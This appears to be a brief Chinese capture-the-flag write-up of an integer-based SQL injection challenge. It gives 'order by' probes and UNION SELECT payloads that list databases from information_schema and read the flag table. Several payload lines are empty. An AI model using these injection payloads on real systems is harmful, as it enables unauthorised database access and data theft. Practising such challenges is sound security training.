整數型注入
考點 SQL注入-整數型注入
分析過程
輸入 1試試
![](https://img.laitimes.com/img/__Qf2AjLwojIjJCLyojI0JCLiAzNfRHLGZkRGZkRfJ3bs92YsYTMfVmepNHL9smeNFTUU90MRRVT3V1MMBjVtJWd0ckW65UbM5WOHJWa5kHT20ESjBjUIF2X0hXZ0xCMx81dvRWYoNHLrdEZwZ1Rh5WNXp1bwNjW1ZUba9VZwlHdssmch1mclRXY39CXldWYtlWPzNXZj9mcw1ycz9WL49zZuBnL3YzN1MjMygTM1AzNwEjMwIzLc52YucWbp5GZzNmLn9Gbi1yZtl2Lc9CX6MHc0RHaiojIsJye.png)
得到回顯結果如上
由于已知是整數型 是以直接判斷列數
playload:
?id=1 order by 1
?id=1 order by 1,2
?id=1 order by 1,2,3
到3時無回顯由此得出其有兩列
然後查詢庫名
playload:
得到庫名 此時可以爆出所有的資料庫名
playload:
?id=-1 union select 1,group_concat(schema_name) from information_schema.schemata
根據庫名爆表名
playload:
然後去爆flag的字段
playload:
爆出字段可以直接查詢資料
playload:
?id=-1 union select 1,group_concat(flag) from sqli.flag
屬于是得到flag